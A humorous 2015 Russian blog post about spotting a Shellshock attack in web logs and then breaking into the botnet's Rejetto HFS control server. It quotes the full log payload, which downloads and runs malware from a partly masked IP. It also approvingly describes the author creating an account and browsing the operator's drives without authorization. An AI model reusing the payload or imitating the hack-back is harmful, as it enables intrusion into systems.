...

воскресенье, 12 апреля 2015 г.

Воскресный сказ о важности обновления, даже если вы ботнет оператор

Или не грози солнечной Исландии, попивая чай у себя в Гунчжоу.

image

На КДПВ изображен возможный ботнет оператор, как я его себе представляю.Технических подробностей будет минимально, в основном глум — добро пожаловать


Боты


Началось все стандартно, ничего не предвещало беды — субботним вечером я решил почистить переполнившийся /var/log на веб сервере. Ввиду специфики данного сервера, логи на нём не являются сколько нибудь значимыми, как и факт переполнения раздела; ну, разве что мониторинг начинает писать чаще, да новые события не анализируются. В процессе чистки выяснилось что боты все так-же упорно ломятся подбирать пароль рута на ssh, пытаются найти пхп который бы выполнил их квадратно-гнездовые пожелания, да периодически сканят то, чего сканить смысла не имеет. Тишь да благодать одним словом. Разве что глаз цепляется за странно большие запросы в логах:

1.2.3.4 - - [20/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 14932 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.x.y:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.x.y:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"


Вот он, shellshock. Особенно трогательно смотрится обязательное упоминание автора отдельным вызовом «echo By China.Z» и перепутанные местами вызовы «rm» и «chmod», это и сподвигло меня посмотреть, а что же мне предлагается скачать и исполнить (самому, ибо вначале rm, а потом chmod и вызов.).

Бот-сервер


Сервер оказался открытым и живым, по хттп одавал список из замечательных файлов на все случаи жизни:image

Не смотрите на директорию temp и пользователя adm, я не сразу догадался делать скриншоты. Вначале директории не было, вместо пользователя предлагалось залогиниться. Лучше посмотрите на аптайм сервера и количество хитов, или вот например на файл, как его видят антивирусы. Внутри конечно куча всего интересного — умеет ддосить разными способами, умеет даже майнить (в отличие от тебя, ЦБ :-), и распространяться (правда, неумело), но это топик не про реверс. Разве что примечательно, что strings выдает списки из нескольких десятков вкомпиленных IPv4 адресов, большинство конечно с Китая.

Замечательный сервер Rejetto HFS


Честно говоря, ни разу с ним не сталкивался, и если бы он так сильно не заявлял о своем присутствии на странице внизу, так бы я и ушел с этого сайта, потеряв интерес. Но это было сделать не судьба. У сервера оказался потрясающий функционал. Цитатка:

File manipulation

load | A

you'll love this one. You can specify A as a file name, or as a URL. It will load and expand to it.





Haha, god damn i will!!

В дополнение, у данной версии оказалась не только «технологическое отверстие», позволяющее воспользоваться всем этим замечательным функционалом используя простой netcat, но и готовый модуль к метасплойту для совсем ленивых.Поэтому сначала простым вгетом был сделан пользователь adm, и следом осуществлен выход из jail (или как там правильно называется оный аналог в виндоус) путем маппинга директории temp в корень диска C:\. Сон стремительно накрылся, любопытство одержало верх.
Для вуайеристов, несколько картинок типового окружения китайского ботмастера и потенциального биткоин-миллионера (судя по спискам майнеров, хехе):
Диск С:\imageДиск D:\imageProgram Files:image


Ничего примечательного, и ничего, чтобы хоть чуть-чуть могло помешать доступу. И разумеется, бонусом было то, что все работало из под учетной записи администратора. Из минусов — очень низкая скорость. Не исследовал, заслуга ли это китайского файрвола, или же просто загруженная машина, но улов был ограничен скоростью в пару сотен килобит в секунду, с пиками до мегабита. И да, все на китайском, что сильно затрудняло исследования, требуя итерацию через гугл-транслейт.

Улов



  1. Разнообразные бинарники для фана и профитатм.

  2. Полторы тысячи адресов зараженных машин (должно было быть больше, судя по количеству скачиваний вирусни, но либо файлы чистились, либо считались не хиты а не уники). Большинство Китай, отправлено абузой.

  3. Полторы сотни адресов с разбиением на группы — майнеры, лоадеры и еще какия-то делишки. Оставлено на сладкое.

  4. Можно было быть стелс ниндзей, засадить трояны и ботить ботоводов, но было поздно, было лень, и, честно говоря, товарищ майор, скилов то таких даже и нет. Посему режим тишины не соблюдался, сервер пищал/скрипел удаляя/копируя/файлы. И как результат, чувство, когда связь прерывается, и почти слышны матюки на китайском — бесценно.


качество ничто, лулзы всё
image


Минтука Капитана О.



  • Не сидите под администратором.

  • Не запускайте веб-сервисы под администратором.

  • Своевременно обновляйте программное обеспечение.

  • Не держите ботнет-центр на домашних ПК.

  • Регулярно меняйте его адрес.

  • Настройте фаервол, даже если у вас нет ботнета.

  • На каждую хитрую задницу, найдется! (с)


Мы же, со своей стороны, свято верим в последний пункт, и продолжаем предоставлять рутовый доступ без пароля для «поиграться», теперь — с непатченным shellshock!

Надеюсь, вам понравилось. Если кому нужно для образовательных нужд чего — пишите в личку.

This entry passed through the Full-Text RSS service - if this is your content and you're reading it on someone else's site, please read the FAQ at http://fivefilters.org/content-only/faq.php#publishers.


Комментариев нет:

Отправить комментарий